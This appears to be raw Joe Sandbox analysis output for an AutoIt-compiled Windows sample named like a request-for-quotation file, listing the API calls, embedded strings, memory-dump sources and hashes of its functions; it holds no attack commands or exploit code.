                                                            • GetCursorInfo.USER32(?), ref: 00807A7B
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: Cursor$Load$Info
                                                            • String ID:
                                                            • API String ID: 2577412497-0
                                                            • Opcode ID: b6704ccb7b1a705e2721a5d26396a93cd3eb4c93f90fe72858c3a87d7a7e57ed
                                                            • Instruction ID: cbb89490df445d615d2f6e71c0140aedfc1cc7722ed09e912251b32ef1b3f588
                                                            • Opcode Fuzzy Hash: b6704ccb7b1a705e2721a5d26396a93cd3eb4c93f90fe72858c3a87d7a7e57ed
                                                            • Instruction Fuzzy Hash: DE3129B0E083196ADB509FB68C8995FBFE8FF04750F50453AE50DE7181DB78A5008FA1
                                                            APIs
                                                              • Part of subcall function 007CE968: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,007BC8B7,?,00002000,?,?,00000000,?,007B419E,?,?,?,0084DC00), ref: 007CE984
                                                              • Part of subcall function 007B660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,007B53B1,?,?,007B61FF,?,00000000,00000001,00000000), ref: 007B662F
                                                            • __wsplitpath.LIBCMT ref: 007BC93E
                                                              • Part of subcall function 007D1DFC: __wsplitpath_helper.LIBCMT ref: 007D1E3C
                                                            • _wcscpy.LIBCMT ref: 007BC953
                                                            • _wcscat.LIBCMT ref: 007BC968
                                                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 007BC978
                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 007BCABE
                                                              • Part of subcall function 007BB337: _wcscpy.LIBCMT ref: 007BB36F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: CurrentDirectory$_wcscpy$FullNamePath__wsplitpath__wsplitpath_helper_wcscat
                                                            • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                            • API String ID: 2258743419-1018226102
                                                            • Opcode ID: af54d5b49fc8040755ab09343eda7f20ec10cc64f74f1c94512b49a815b69b9d
                                                            • Instruction ID: 0ac8d0f9d171cbf7b4cbcb4f588f55a67d977d3436c2b0054137543e64c2e28e
                                                            • Opcode Fuzzy Hash: af54d5b49fc8040755ab09343eda7f20ec10cc64f74f1c94512b49a815b69b9d
                                                            • Instruction Fuzzy Hash: A4126771508341DBC725EF24D895AAFBBE5FF98304F00491EF58993262DB38DA89CB52
                                                            APIs
                                                            • _memset.LIBCMT ref: 0081CEFB
                                                            • DestroyWindow.USER32(?,?), ref: 0081CF73
                                                            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0081CFF4
                                                            • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0081D016
                                                            • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0081D025
                                                            • DestroyWindow.USER32(?), ref: 0081D042
                                                            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,007B0000,00000000), ref: 0081D075
                                                            • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0081D094
                                                            • GetDesktopWindow.USER32 ref: 0081D0A9
                                                            • GetWindowRect.USER32(00000000), ref: 0081D0B0
                                                            • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0081D0C2
                                                            • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0081D0DA
                                                              • Part of subcall function 007CB526: GetWindowLongW.USER32(?,000000EB), ref: 007CB537
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memset
                                                            • String ID: 0$tooltips_class32
                                                            • API String ID: 3877571568-3619404913
                                                            • Opcode ID: c0ee68948a838b00b1e6310ae0c7baf9a89fee0ae7a931a1798133334cbe9f4a
                                                            • Instruction ID: c7b382d68ef1bea6a7574692583799d352deb2e1beafb9706b04ed164a1a40ea
                                                            • Opcode Fuzzy Hash: c0ee68948a838b00b1e6310ae0c7baf9a89fee0ae7a931a1798133334cbe9f4a
                                                            • Instruction Fuzzy Hash: 567168B1150705AFDB20CF28CC89FA677A9FB98704F084619F995C72A1D774E982CB62
                                                            APIs
                                                              • Part of subcall function 007CB34E: GetWindowLongW.USER32(?,000000EB), ref: 007CB35F
                                                            • DragQueryPoint.SHELL32(?,?), ref: 0081F37A
                                                              • Part of subcall function 0081D7DE: ClientToScreen.USER32(?,?), ref: 0081D807
                                                              • Part of subcall function 0081D7DE: GetWindowRect.USER32(?,?), ref: 0081D87D
                                                              • Part of subcall function 0081D7DE: PtInRect.USER32(?,?,0081ED5A), ref: 0081D88D
                                                            • SendMessageW.USER32(?,000000B0,?,?), ref: 0081F3E3
                                                            • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0081F3EE
                                                            • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0081F411
                                                            • _wcscat.LIBCMT ref: 0081F441
                                                            • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0081F458
                                                            • SendMessageW.USER32(?,000000B0,?,?), ref: 0081F471
                                                            • SendMessageW.USER32(?,000000B1,?,?), ref: 0081F488
                                                            • SendMessageW.USER32(?,000000B1,?,?), ref: 0081F4AA
                                                            • DragFinish.SHELL32(?), ref: 0081F4B1
                                                            • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0081F59C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                            • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                            • API String ID: 169749273-3440237614
                                                            • Opcode ID: 79924bcd3894c14ea1026f52fbd55e55b3dd23282f9c221d8ee5112c5c6b870b
                                                            • Instruction ID: a56ef42aa67692cf0cb41d3176eaa17f73186d3e9da484add33a07592ad1a369
                                                            • Opcode Fuzzy Hash: 79924bcd3894c14ea1026f52fbd55e55b3dd23282f9c221d8ee5112c5c6b870b
                                                            • Instruction Fuzzy Hash: 0F613A71108300AFC711EF64DC4AE9FBBE8FF98714F004A1DB695961A1DB74DA49CB52
                                                            APIs
                                                            • VariantInit.OLEAUT32(00000000), ref: 007FAB3D
                                                            • VariantCopy.OLEAUT32(?,?), ref: 007FAB46
                                                            • VariantClear.OLEAUT32(?), ref: 007FAB52
                                                            • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 007FAC40
                                                            • __swprintf.LIBCMT ref: 007FAC70
                                                            • VarR8FromDec.OLEAUT32(?,?), ref: 007FAC9C
                                                            • VariantInit.OLEAUT32(?), ref: 007FAD4D
                                                            • SysFreeString.OLEAUT32(00000016), ref: 007FADDF
                                                            • VariantClear.OLEAUT32(?), ref: 007FAE35
                                                            • VariantClear.OLEAUT32(?), ref: 007FAE44
                                                            • VariantInit.OLEAUT32(00000000), ref: 007FAE80
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
                                                            • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                            • API String ID: 3730832054-3931177956
                                                            • Opcode ID: 58e94f4b05fdb5194c1a46683979bb501e2726c8ee7e6a1e3928909a0f7d819c
                                                            • Instruction ID: e9159ad33d2ad71665ce99ca0508f50b2efbcec18e5296473457d0ca1e99336c
                                                            • Opcode Fuzzy Hash: 58e94f4b05fdb5194c1a46683979bb501e2726c8ee7e6a1e3928909a0f7d819c
                                                            • Instruction Fuzzy Hash: 45D1BFF1604209EBCB249F65D889BB9B7B5FF04700F148499E6199B381DB7CED40DBA2
                                                            APIs
                                                            • CharUpperBuffW.USER32(?,?), ref: 008171FC
                                                            • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00817247
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: BuffCharMessageSendUpper
                                                            • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                            • API String ID: 3974292440-4258414348
                                                            • Opcode ID: 943765aa586bc34628defe5328170579512c04a1c29b6bfeeb68e6ae232ee6df
                                                            • Instruction ID: 10fb5f7682410fdf3a2e06af150c52e050647751a0c0b89da65292f01a80153e
                                                            • Opcode Fuzzy Hash: 943765aa586bc34628defe5328170579512c04a1c29b6bfeeb68e6ae232ee6df
                                                            • Instruction Fuzzy Hash: D5917C74208601DBCB15EF20C845AAEB7A5FF94304F05485CF9969B3A3DB38ED4ACB91
                                                            APIs
                                                            • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 0081E5AB
                                                            • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,0081BEAF), ref: 0081E607
                                                            • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0081E647
                                                            • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0081E68C
                                                            • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0081E6C3
                                                            • FreeLibrary.KERNEL32(?,00000004,?,?,?,?,0081BEAF), ref: 0081E6CF
                                                            • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0081E6DF
                                                            • DestroyIcon.USER32(?,?,?,?,?,0081BEAF), ref: 0081E6EE
                                                            • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 0081E70B
                                                            • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 0081E717
                                                              • Part of subcall function 007D0FA7: __wcsicmp_l.LIBCMT ref: 007D1030
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                                            • String ID: .dll$.exe$.icl
                                                            • API String ID: 1212759294-1154884017
                                                            • Opcode ID: 3b67db77b7cbe3002518b4264e7942d2daa8a180914116bbab64dc97c3f7abd4
                                                            • Instruction ID: 91c25fb08b808af320f20bbf11f0c3603cb9862e3b515d3ab1c8f016353cf25c
                                                            • Opcode Fuzzy Hash: 3b67db77b7cbe3002518b4264e7942d2daa8a180914116bbab64dc97c3f7abd4
                                                            • Instruction Fuzzy Hash: 71618A71500219FAEB249F64DC46FEE7BACFF28724F104506F915E61D1EBB4A990CBA0
                                                            APIs
                                                              • Part of subcall function 007B936C: __swprintf.LIBCMT ref: 007B93AB
                                                              • Part of subcall function 007B936C: __itow.LIBCMT ref: 007B93DF
                                                            • CharLowerBuffW.USER32(?,?), ref: 007FD292
                                                            • GetDriveTypeW.KERNEL32 ref: 007FD2DF
                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 007FD327
                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 007FD35E
                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 007FD38C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: SendString$BuffCharDriveLowerType__itow__swprintf
                                                            • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                            • API String ID: 1148790751-4113822522
                                                            • Opcode ID: 0b4d17853c7866fb2b0d8a1e6fe87f361aa8ba32b9efc326c2304598ae93c8a0
                                                            • Instruction ID: 72c9f8331c0b5041b3d2a01fb49cd0b71e5b555474fa4bfa8500342ea15a002a
                                                            • Opcode Fuzzy Hash: 0b4d17853c7866fb2b0d8a1e6fe87f361aa8ba32b9efc326c2304598ae93c8a0
                                                            • Instruction Fuzzy Hash: F1514871104708DFC710EF10C885AAAB3E5FF88718F00885CF995A7291DB39EE0ACB92
                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000016,00000000,?,?,00823973,00000016,0000138C,00000016,?,00000016,0084DDB4,00000000,?), ref: 007F26F1
                                                            • LoadStringW.USER32(00000000,?,00823973,00000016), ref: 007F26FA
                                                            • GetModuleHandleW.KERNEL32(00000000,00000016,?,00000FFF,?,?,00823973,00000016,0000138C,00000016,?,00000016,0084DDB4,00000000,?,00000016), ref: 007F271C
                                                            • LoadStringW.USER32(00000000,?,00823973,00000016), ref: 007F271F
                                                            • __swprintf.LIBCMT ref: 007F276F
                                                            • __swprintf.LIBCMT ref: 007F2780
                                                            • _wprintf.LIBCMT ref: 007F2829
                                                            • MessageBoxW.USER32(00000000,?,?,00011010), ref: 007F2840
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: HandleLoadModuleString__swprintf$Message_wprintf
                                                            • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                            • API String ID: 618562835-2268648507
                                                            • Opcode ID: 2f388f6e54598cdfc7d596a2fb66cd4e993246fc71167cd45f13202a67b2b9f5
                                                            • Instruction ID: 0fd80d1bcc54c3e2697d30d950cc13fba69d87715a9c42f434a8dd494e068335
                                                            • Opcode Fuzzy Hash: 2f388f6e54598cdfc7d596a2fb66cd4e993246fc71167cd45f13202a67b2b9f5
                                                            • Instruction Fuzzy Hash: 4D412C7280021DFACB15FBD0DD8AFEEB778AF54340F500065B601B2192EA786F49CB61
                                                            APIs
                                                            • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 007FD0D8
                                                            • __swprintf.LIBCMT ref: 007FD0FA
                                                            • CreateDirectoryW.KERNEL32(?,00000000), ref: 007FD137
                                                            • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 007FD15C
                                                            • _memset.LIBCMT ref: 007FD17B
                                                            • _wcsncpy.LIBCMT ref: 007FD1B7
                                                            • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 007FD1EC
                                                            • CloseHandle.KERNEL32(00000000), ref: 007FD1F7
                                                            • RemoveDirectoryW.KERNEL32(?), ref: 007FD200
                                                            • CloseHandle.KERNEL32(00000000), ref: 007FD20A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                            • String ID: :$\$\??\%s
                                                            • API String ID: 2733774712-3457252023
                                                            • Opcode ID: c643343a21172217ad6958ae12bd1165ca0bd639bb9fa7f0da81e4944bcbe503
                                                            • Instruction ID: aaaf9cb0da02f419c2644c292adf2e5739c0de99eb945ba42edd64236c28c843
                                                            • Opcode Fuzzy Hash: c643343a21172217ad6958ae12bd1165ca0bd639bb9fa7f0da81e4944bcbe503
                                                            • Instruction Fuzzy Hash: C531AFB2900209ABDB21DFA0DC49FEB77BDFF89700F1044B6F609D2260E7749A458B64
                                                            APIs
                                                            • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,0081BEF4,?,?), ref: 0081E754
                                                            • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,0081BEF4,?,?,00000000,?), ref: 0081E76B
                                                            • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,0081BEF4,?,?,00000000,?), ref: 0081E776
                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,0081BEF4,?,?,00000000,?), ref: 0081E783
                                                            • GlobalLock.KERNEL32(00000000), ref: 0081E78C
                                                            • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,0081BEF4,?,?,00000000,?), ref: 0081E79B
                                                            • GlobalUnlock.KERNEL32(00000000), ref: 0081E7A4
                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,0081BEF4,?,?,00000000,?), ref: 0081E7AB
                                                            • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,0081BEF4,?,?,00000000,?), ref: 0081E7BC
                                                            • OleLoadPicture.OLEAUT32(?,00000000,00000000,0083D9BC,?), ref: 0081E7D5
                                                            • GlobalFree.KERNEL32(00000000), ref: 0081E7E5
                                                            • GetObjectW.GDI32(00000000,00000018,?), ref: 0081E809
                                                            • CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 0081E834
                                                            • DeleteObject.GDI32(00000000), ref: 0081E85C
                                                            • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 0081E872
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                            • String ID:
                                                            • API String ID: 3840717409-0
                                                            • Opcode ID: 721a7f8c2bff5f3ec4ed0ecfbdf2d5efcfe9cc6961824aebd317184be2f97973
                                                            • Instruction ID: e34832167a8318199980466c1e7d00c475e94fb08dac0c1e3837d22d829bb25a
                                                            • Opcode Fuzzy Hash: 721a7f8c2bff5f3ec4ed0ecfbdf2d5efcfe9cc6961824aebd317184be2f97973
                                                            • Instruction Fuzzy Hash: 81411875600208AFDB119F65EC88EAABBB8FF89715F104868F916D72A0D770A941DB60
                                                            APIs
                                                            • __wsplitpath.LIBCMT ref: 0080076F
                                                            • _wcscat.LIBCMT ref: 00800787
                                                            • _wcscat.LIBCMT ref: 00800799
                                                            • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 008007AE
                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 008007C2
                                                            • GetFileAttributesW.KERNEL32(?), ref: 008007DA
                                                            • SetFileAttributesW.KERNEL32(?,00000000), ref: 008007F4
                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00800806
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                            • String ID: *.*
                                                            • API String ID: 34673085-438819550
                                                            • Opcode ID: 9b79ad2e3f58461003e98e11109adf2d0b3cd2d297eb8c2fce06146caa8c140c
                                                            • Instruction ID: e04c757cf55f76c68f9d1e02cc7cb195c44bf56e71af5801f2a71554e786496f
                                                            • Opcode Fuzzy Hash: 9b79ad2e3f58461003e98e11109adf2d0b3cd2d297eb8c2fce06146caa8c140c
                                                            • Instruction Fuzzy Hash: CC81AE715043459FCBA0DF24CC44AAEB3E9FBD8304F18882EF899C7291EA35D9448F92
                                                            APIs
                                                              • Part of subcall function 007CB34E: GetWindowLongW.USER32(?,000000EB), ref: 007CB35F
                                                            • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0081EF3B
                                                            • GetFocus.USER32 ref: 0081EF4B
                                                            • GetDlgCtrlID.USER32(00000000), ref: 0081EF56
                                                            • _memset.LIBCMT ref: 0081F081
                                                            • GetMenuItemInfoW.USER32 ref: 0081F0AC
                                                            • GetMenuItemCount.USER32(00000000), ref: 0081F0CC
                                                            • GetMenuItemID.USER32(?,00000000), ref: 0081F0DF
                                                            • GetMenuItemInfoW.USER32(00000000,-00000001,00000001,?), ref: 0081F113
                                                            • GetMenuItemInfoW.USER32(00000000,?,00000001,?), ref: 0081F15B
                                                            • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0081F193
                                                            • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 0081F1C8
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
